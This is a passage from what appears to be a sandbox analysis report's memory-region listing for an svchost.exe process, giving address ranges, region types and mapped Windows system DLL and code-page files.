entry_point = 0x0
region_type = private
name = "private_0x0000000003090000"
filename = ""
Region:
id = 925
start_va = 0x3110000
end_va = 0x318ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003110000"
filename = ""
Region:
id = 926
start_va = 0x3190000
end_va = 0x328ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003190000"
filename = ""
Region:
id = 927
start_va = 0x3290000
end_va = 0x330ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003290000"
filename = ""
Region:
id = 928
start_va = 0x3390000
end_va = 0x3396fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003390000"
filename = ""
Region:
id = 929
start_va = 0x34a0000
end_va = 0x34b0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1254.nls"
filename = "\\Windows\\System32\\C_1254.NLS" (normalized: "c:\\windows\\system32\\c_1254.nls")
Region:
id = 930
start_va = 0x34c0000
end_va = 0x34d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1250.nls"
filename = "\\Windows\\System32\\C_1250.NLS" (normalized: "c:\\windows\\system32\\c_1250.nls")
Region:
id = 931
start_va = 0x34e0000
end_va = 0x34f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1253.nls"
filename = "\\Windows\\System32\\C_1253.NLS" (normalized: "c:\\windows\\system32\\c_1253.nls")
Region:
id = 932
start_va = 0x3500000
end_va = 0x3510fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1257.nls"
filename = "\\Windows\\System32\\C_1257.NLS" (normalized: "c:\\windows\\system32\\c_1257.nls")
Region:
id = 933
start_va = 0x3520000
end_va = 0x3530fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1255.nls"
filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls")
Region:
id = 934
start_va = 0x3540000
end_va = 0x3567fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_932.nls"
filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls")
Region:
id = 935
start_va = 0x3570000
end_va = 0x35effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003570000"
filename = ""
Region:
id = 936
start_va = 0x35f0000
end_va = 0x3620fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_949.nls"
filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls")
Region:
id = 937
start_va = 0x3630000
end_va = 0x3640fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_874.nls"
filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls")
Region:
id = 938
start_va = 0x3650000
end_va = 0x3660fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1258.nls"
filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls")
Region:
id = 939
start_va = 0x3670000
end_va = 0x376ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003670000"
filename = ""
Region:
id = 940
start_va = 0x3770000
end_va = 0x386ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003770000"
filename = ""
Region:
id = 941
start_va = 0x3870000
end_va = 0x38effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003870000"
filename = ""
Region:
id = 942
start_va = 0x3900000
end_va = 0x39fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003900000"
filename = ""
Region:
id = 943
start_va = 0x3a00000
end_va = 0x3afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a00000"
filename = ""
Region:
id = 944
start_va = 0x3b00000
end_va = 0x3bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b00000"
filename = ""
Region:
id = 945
start_va = 0x3c00000
end_va = 0x3c7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003c00000"
filename = ""
Region:
id = 946
start_va = 0x3c80000
end_va = 0x3d7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003c80000"
filename = ""
Region:
id = 947
start_va = 0x3d80000
end_va = 0x3e7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003d80000"
filename = ""
Region:
id = 948
start_va = 0x3e80000
end_va = 0x3eb0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_936.nls"
filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls")
Region:
id = 949
start_va = 0x3ec0000
end_va = 0x3ef0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_950.nls"
filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls")
Region:
id = 950
start_va = 0x3f00000
end_va = 0x3ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003f00000"
filename = ""
Region:
id = 951
start_va = 0x4000000
end_va = 0x40fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004000000"
filename = ""
Region:
id = 952
start_va = 0x4100000
end_va = 0x41fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004100000"
filename = ""
Region:
id = 953
start_va = 0x4200000
end_va = 0x42fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004200000"
filename = ""
Region:
id = 954
start_va = 0x4300000
end_va = 0x43fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004300000"
filename = ""
Region:
id = 955
start_va = 0x4400000
end_va = 0x44fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004400000"
filename = ""
Region:
id = 956
start_va = 0x4500000
end_va = 0x45fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004500000"
filename = ""
Region:
id = 957
start_va = 0x4600000
end_va = 0x46fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004600000"
filename = ""
Region:
id = 958
start_va = 0x4700000
end_va = 0x47fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004700000"
filename = ""
Region:
id = 959
start_va = 0x4800000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004800000"
filename = ""
Region:
id = 960
start_va = 0x4900000
end_va = 0x49fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004900000"
filename = ""
Region:
id = 961
start_va = 0x4a00000
end_va = 0x4afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a00000"
filename = ""
Region:
id = 962
start_va = 0x4b00000
end_va = 0x4bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b00000"
filename = ""
Region:
id = 963
start_va = 0x4c00000
end_va = 0x4cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c00000"
filename = ""
Region:
id = 964
start_va = 0x4d00000
end_va = 0x4dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 965
start_va = 0x4f00000
end_va = 0x4ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f00000"
filename = ""
Region:
id = 966
start_va = 0x5000000
end_va = 0x50fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005000000"
filename = ""
Region:
id = 967
start_va = 0x5200000
end_va = 0x5206fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005200000"
filename = ""
Region:
id = 968
start_va = 0x5300000
end_va = 0x53fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005300000"
filename = ""
Region:
id = 969
start_va = 0x5400000
end_va = 0x54fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005400000"
filename = ""
Region:
id = 970
start_va = 0x5600000
end_va = 0x56fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005600000"
filename = ""
Region:
id = 971
start_va = 0x57a0000
end_va = 0x57a6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000057a0000"
filename = ""
Region:
id = 972
start_va = 0x57b0000
end_va = 0x58affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000057b0000"
filename = ""
Region:
id = 973
start_va = 0x5970000
end_va = 0x5976fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005970000"
filename = ""
Region:
id = 974
start_va = 0x5980000
end_va = 0x5a7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005980000"
filename = ""
Region:
id = 975
start_va = 0x5a80000
end_va = 0x5b7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005a80000"
filename = ""
Region:
id = 976
start_va = 0x5c00000
end_va = 0x5cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005c00000"
filename = ""
Region:
id = 977
start_va = 0x5e00000
end_va = 0x5efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005e00000"
filename = ""
Region:
id = 978
start_va = 0x5f00000
end_va = 0x5ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005f00000"
filename = ""
Region:
id = 979
start_va = 0x6000000
end_va = 0x60fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006000000"
filename = ""
Region:
id = 980
start_va = 0x6100000
end_va = 0x61fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006100000"
filename = ""
Region:
id = 981
start_va = 0x6200000
end_va = 0x62fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006200000"
filename = ""
Region:
id = 982
start_va = 0x6300000
end_va = 0x63fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006300000"
filename = ""
Region:
id = 983
start_va = 0x6400000
end_va = 0x64fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006400000"
filename = ""
Region:
id = 984
start_va = 0x6500000
end_va = 0x65fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006500000"
filename = ""
Region:
id = 985
start_va = 0x6700000
end_va = 0x67fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006700000"
filename = ""
Region:
id = 986
start_va = 0x6800000
end_va = 0x68fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006800000"
filename = ""
Region:
id = 987
start_va = 0x6a00000
end_va = 0x6afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006a00000"
filename = ""
Region:
id = 988
start_va = 0x6c00000
end_va = 0x6cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006c00000"
filename = ""
Region:
id = 989
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 990
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 991
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 992
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 993
start_va = 0x7ff681250000
end_va = 0x7ff68125cfff
monitored = 0
entry_point = 0x7ff681253980
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 994
start_va = 0x7ff9fc230000
end_va = 0x7ff9fc246fff
monitored = 0
entry_point = 0x7ff9fc237520
region_type = mapped_file
name = "usoapi.dll"
filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll")
Region:
id = 995
start_va = 0x7ff9fc250000
end_va = 0x7ff9fc324fff
monitored = 0
entry_point = 0x7ff9fc26cf80
region_type = mapped_file
name = "wuapi.dll"
filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll")
Region:
id = 996
start_va = 0x7ff9fc330000
end_va = 0x7ff9fc373fff
monitored = 0
entry_point = 0x7ff9fc3583e0
region_type = mapped_file
name = "updatehandlers.dll"
filename = "\\Windows\\System32\\updatehandlers.dll" (normalized: "c:\\windows\\system32\\updatehandlers.dll")
Region:
id = 997
start_va = 0x7ff9fc470000
end_va = 0x7ff9fc4ccfff
monitored = 0
entry_point = 0x7ff9fc49e510
region_type = mapped_file
name = "usocore.dll"
filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll")
Region:
id = 998
start_va = 0x7ff9fc510000
end_va = 0x7ff9fc531fff
monitored = 0
entry_point = 0x7ff9fc522540
region_type = mapped_file
name = "updatepolicy.dll"
filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll")
Region:
id = 999
start_va = 0x7ff9fdf30000
end_va = 0x7ff9fe1dffff
monitored = 0
entry_point = 0x7ff9fdf31cf0
region_type = mapped_file
name = "netshell.dll"
filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll")
Region:
id = 1000
start_va = 0x7ff9ff0b0000
end_va = 0x7ff9ff0e1fff
monitored = 0
entry_point = 0x7ff9ff0bb0c0
region_type = mapped_file
name = "shacct.dll"
filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll")
Region:
id = 1001
start_va = 0x7ff9ff8d0000
end_va = 0x7ff9ff90efff
monitored = 0
entry_point = 0x7ff9ff8f82d0
region_type = mapped_file
name = "tcpipcfg.dll"
filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll")
Region:
id = 1002
start_va = 0x7ff9ffa00000
end_va = 0x7ff9ffa7ffff
monitored = 0
entry_point = 0x7ff9ffa2d280
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 1003
start_va = 0x7ff9ffa80000
end_va = 0x7ff9ffae6fff
monitored = 0
entry_point = 0x7ff9ffa8b160
region_type = mapped_file
name = "upnp.dll"
filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll")
Region:
id = 1004
start_va = 0x7ff9ffc50000
end_va = 0x7ff9ffd5efff
monitored = 0
entry_point = 0x7ff9ffc8c010
region_type = mapped_file
name = "dosvc.dll"
filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll")
Region:
id = 1005
start_va = 0x7ffa001f0000
end_va = 0x7ffa0030cfff
monitored = 0
entry_point = 0x7ffa0021fe60
region_type = mapped_file
name = "qmgr.dll"
filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll")
Region:
id = 1006
start_va = 0x7ffa00310000
end_va = 0x7ffa00345fff
monitored = 0
entry_point = 0x7ffa003127f0
region_type = mapped_file
name = "windows.networking.hostname.dll"
filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll")
Region:
id = 1007
start_va = 0x7ffa00c70000
end_va = 0x7ffa00c77fff
monitored = 0
entry_point = 0x7ffa00c713b0
region_type = mapped_file
name = "dmiso8601utils.dll"
filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll")
Region:
id = 1008
start_va = 0x7ffa00c80000
end_va = 0x7ffa00c91fff
monitored = 0
entry_point = 0x7ffa00c81a80
region_type = mapped_file
name = "bitsproxy.dll"
filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll")
Region:
id = 1009
start_va = 0x7ffa00cd0000
end_va = 0x7ffa00ce3fff
monitored = 0
entry_point = 0x7ffa00cd2a00
region_type = mapped_file
name = "bitsigd.dll"
filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll")
Region:
id = 1010
start_va = 0x7ffa01260000
end_va = 0x7ffa01270fff
monitored = 0
entry_point = 0x7ffa012628d0
region_type = mapped_file
name = "credentialmigrationhandler.dll"
filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll")
Region:
id = 1011
start_va = 0x7ffa01690000
end_va = 0x7ffa016a3fff
monitored = 0
entry_point = 0x7ffa01693710
region_type = mapped_file
name = "mskeyprotect.dll"
filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll")
Region:
id = 1012
start_va = 0x7ffa01740000
end_va = 0x7ffa0175dfff
monitored = 0
entry_point = 0x7ffa0174ef80
region_type = mapped_file
name = "ncryptsslp.dll"
filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll")
Region:
id = 1013
start_va = 0x7ffa06940000
end_va = 0x7ffa06957fff
monitored = 0
entry_point = 0x7ffa0694b850
region_type = mapped_file
name = "dmcmnutils.dll"
filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll")
Region:
id = 1014
start_va = 0x7ffa069a0000
end_va = 0x7ffa069b5fff
monitored = 0
entry_point = 0x7ffa069a1d50
region_type = mapped_file
name = "wwapi.dll"
filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll")
Region:
id = 1015
start_va = 0x7ffa07a20000
end_va = 0x7ffa07a30fff
monitored = 0
entry_point = 0x7ffa07a27480
region_type = mapped_file
name = "tetheringclient.dll"
filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll")
Region:
id = 1016
start_va = 0x7ffa07a40000
end_va = 0x7ffa07ac3fff
monitored = 0
entry_point = 0x7ffa07a58d50
region_type = mapped_file
name = "wbemess.dll"
filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")
Region:
id = 1017
start_va = 0x7ffa07ad0000
end_va = 0x7ffa07ae5fff
monitored = 0
entry_point = 0x7ffa07ad55e0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 1018
start_va = 0x7ffa07af0000
end_va = 0x7ffa07bc5fff
monitored = 0
entry_point = 0x7ffa07b1a800
region_type = mapped_file
name = "wmiprvsd.dll"
filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")
Region:
id = 1019
start_va = 0x7ffa07c20000
end_va = 0x7ffa07c83fff
monitored = 0
entry_point = 0x7ffa07c3bed0
region_type = mapped_file
name = "repdrvfs.dll"
filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")
Region:
id = 1020
start_va = 0x7ffa07c90000
end_va = 0x7ffa07cb4fff
monitored = 0
entry_point = 0x7ffa07c99900
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 1021
start_va = 0x7ffa07cc0000
end_va = 0x7ffa07cd3fff
monitored = 0
entry_point = 0x7ffa07cc1800
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 1022
start_va = 0x7ffa07ce0000
end_va = 0x7ffa07dd5fff
monitored = 0
entry_point = 0x7ffa07d19590
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 1023
start_va = 0x7ffa07de0000
end_va = 0x7ffa07e53fff
monitored = 0
entry_point = 0x7ffa07df5eb0
region_type = mapped_file
name = "esscli.dll"
filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")
Region:
id = 1024
start_va = 0x7ffa07e60000
end_va = 0x7ffa07f96fff
monitored = 0
entry_point = 0x7ffa07ea0480
region_type = mapped_file
name = "wbemcore.dll"
filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")
Region:
id = 1025
start_va = 0x7ffa08390000
end_va = 0x7ffa083a0fff
monitored = 0
entry_point = 0x7ffa08392fc0
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 1026
start_va = 0x7ffa083b0000
end_va = 0x7ffa083cdfff
monitored = 0
entry_point = 0x7ffa083b3a40
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 1027
start_va = 0x7ffa083d0000
end_va = 0x7ffa08451fff
monitored = 0
entry_point = 0x7ffa083d2a10
region_type = mapped_file
name = "hnetcfg.dll"
filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")
Region:
id = 1028
start_va = 0x7ffa08460000
end_va = 0x7ffa08475fff
monitored = 0
entry_point = 0x7ffa08461af0
region_type = mapped_file
name = "napinsp.dll"
filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll")
Region:
id = 1029
start_va = 0x7ffa08480000
end_va = 0x7ffa08499fff
monitored = 0
entry_point = 0x7ffa08482330
region_type = mapped_file
name = "pnrpnsp.dll"
filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll")
Region:
id = 1030
start_va = 0x7ffa088d0000
end_va = 0x7ffa08915fff
monitored = 0
entry_point = 0x7ffa088d79a0
region_type = mapped_file
name = "adsldp.dll"
filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll")
Region:
id = 1031
start_va = 0x7ffa08940000
end_va = 0x7ffa0894efff
monitored = 0
entry_point = 0x7ffa08944960
region_type = mapped_file
name = "nci.dll"
filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")
Region:
id = 1032
start_va = 0x7ffa08a00000
end_va = 0x7ffa08a0bfff
monitored = 0
entry_point = 0x7ffa08a035c0
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 1033
start_va = 0x7ffa08a10000
end_va = 0x7ffa08a4ffff
monitored = 0
entry_point = 0x7ffa08a1cbe0
region_type = mapped_file
name = "adsldpc.dll"
filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll")
Region:
id = 1034
start_va = 0x7ffa08a50000
end_va = 0x7ffa08a96fff
monitored = 0
entry_point = 0x7ffa08a51d10
region_type = mapped_file
name = "activeds.dll"
filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll")
Region:
id = 1035
start_va = 0x7ffa08ae0000
end_va = 0x7ffa08b21fff
monitored = 0
entry_point = 0x7ffa08ae3670
region_type = mapped_file
name = "wdscore.dll"
filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")
Region:
id = 1036
start_va = 0x7ffa08e00000
end_va = 0x7ffa08e1efff
monitored = 0
entry_point = 0x7ffa08e037e0
region_type = mapped_file
name = "netsetupapi.dll"
filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll")
Region:
id = 1037
start_va = 0x7ffa08e20000
end_va = 0x7ffa08e98fff
monitored = 0
entry_point = 0x7ffa08e276a0
region_type = mapped_file
name = "netsetupshim.dll"
filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll")
Region:
id = 1038
start_va = 0x7ffa08eb0000
end_va = 0x7ffa08eeffff
monitored = 0
entry_point = 0x7ffa08ec6c60
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 1039
start_va = 0x7ffa08f10000
end_va = 0x7ffa08f27fff
monitored = 0
entry_point = 0x7ffa08f14e10
region_type = mapped_file
name = "adhsvc.dll"
filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll")
Region:
id = 1040
start_va = 0x7ffa08f30000
end_va = 0x7ffa08f54fff
monitored = 0
entry_point = 0x7ffa08f35ca0
region_type = mapped_file
name = "httpprxm.dll"
filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll")
Region:
id = 1041
start_va = 0x7ffa08f60000
end_va = 0x7ffa090e1fff
monitored = 0
entry_point = 0x7ffa08f782a0
region_type = mapped_file
name = "vssapi.dll"
filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")
Region:
id = 1042
start_va = 0x7ffa090f0000
end_va = 0x7ffa09192fff
monitored = 0
entry_point = 0x7ffa090f2c10
region_type = mapped_file
name = "clusapi.dll"
filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")
Region:
id = 1043
start_va = 0x7ffa091a0000
end_va = 0x7ffa091f1fff
monitored = 0
entry_point = 0x7ffa091a5770
region_type = mapped_file
name = "resutils.dll"
filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")
Region:
id = 1044
start_va = 0x7ffa09200000
end_va = 0x7ffa0922dfff
monitored = 1
entry_point = 0x7ffa09202300
region_type = mapped_file
name = "wmidcom.dll"
filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll")
Region:
id = 1045
start_va = 0x7ffa09230000
end_va = 0x7ffa0928dfff
monitored = 0
entry_point = 0x7ffa09235080
region_type = mapped_file
name = "miutils.dll"
filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll")
Region:
id = 1046
start_va = 0x7ffa09290000
end_va = 0x7ffa092affff
monitored = 0
entry_point = 0x7ffa09291f50
region_type = mapped_file
name = "mi.dll"
filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll")
Region:
id = 1047
start_va = 0x7ffa092b0000
end_va = 0x7ffa092b8fff
monitored = 0
entry_point = 0x7ffa092b18f0
region_type = mapped_file
name = "sscoreext.dll"
filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll")
Region:
id = 1048
start_va = 0x7ffa092c0000
end_va = 0x7ffa092d0fff
monitored = 0
entry_point = 0x7ffa092c1d30
region_type = mapped_file
name = "sscore.dll"
filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")
Region:
id = 1049
start_va = 0x7ffa09330000
end_va = 0x7ffa09347fff
monitored = 0
entry_point = 0x7ffa09332000
region_type = mapped_file
name = "vsstrace.dll"
filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")
Region:
id = 1050
start_va = 0x7ffa09350000
end_va = 0x7ffa09390fff
monitored = 0
entry_point = 0x7ffa09353750
region_type = mapped_file
name = "sqmapi.dll"
filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")
Region:
id = 1051
start_va = 0x7ffa09430000
end_va = 0x7ffa0947bfff
monitored = 0
entry_point = 0x7ffa09445310
region_type = mapped_file
name = "srvsvc.dll"
filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")
Region:
id = 1052
start_va = 0x7ffa09490000
end_va = 0x7ffa0950efff
monitored = 0
entry_point = 0x7ffa094a7110
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 1053
start_va = 0x7ffa09510000
end_va = 0x7ffa0954bfff
monitored = 0
entry_point = 0x7ffa09516aa0
region_type = mapped_file
name = "wmisvc.dll"
filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")
Region:
id = 1054
start_va = 0x7ffa09c80000
end_va = 0x7ffa09c88fff
monitored = 0
entry_point = 0x7ffa09c821d0
region_type = mapped_file
name = "httpprxc.dll"
filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll")
Region:
id = 1055
start_va = 0x7ffa09c90000
end_va = 0x7ffa09cc4fff
monitored = 0
entry_point = 0x7ffa09c9a270
region_type = mapped_file
name = "fwpolicyiomgr.dll"
filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll")
Region:
id = 1056
start_va = 0x7ffa0a560000
end_va = 0x7ffa0a652fff
monitored = 0
entry_point = 0x7ffa0a585d80
region_type = mapped_file
